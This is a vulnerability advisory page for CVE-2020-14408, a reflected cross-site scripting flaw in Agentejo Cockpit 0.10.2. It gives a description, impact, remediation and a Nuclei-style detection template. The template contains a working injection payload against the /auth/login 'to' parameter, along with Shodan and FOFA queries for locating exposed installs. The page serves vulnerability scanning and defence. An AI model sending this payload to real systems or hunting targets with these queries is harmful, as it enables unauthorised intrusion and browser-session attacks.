CVE-2020-14408: Agentejo Cockpit 0.10.2 - Cross-Site Scripting

2025-08-01 Agentejo Cockpit PoC Public

Description

Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.

PoC

id: CVE-2020-14408

info:
  name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/agentejo/cockpit/issues/1310
    - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/StarCrossPortal/scalpel
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-14408
    cwe-id: CWE-79
    epss-score: 0.03003
    epss-percentile: 0.86704
    cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: agentejo
    product: cockpit
    shodan-query:
      - http.favicon.hash:688609340
      - http.html:"cockpit"
    fofa-query:
      - icon_hash=688609340
      - body="cockpit"
  tags: cve2020,cve,cockpit,agentejo,xss,oss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "redirectTo = '/92874';alert(document.domain)//280';"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220413a5c3ea8d10c68bd2f324933043d00b14cf6de59eee898aec5d5abebdd5c0a022100b592081e13b17d46da99492de61844b7648ad6da6e7191545dab23c0d35735f1:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities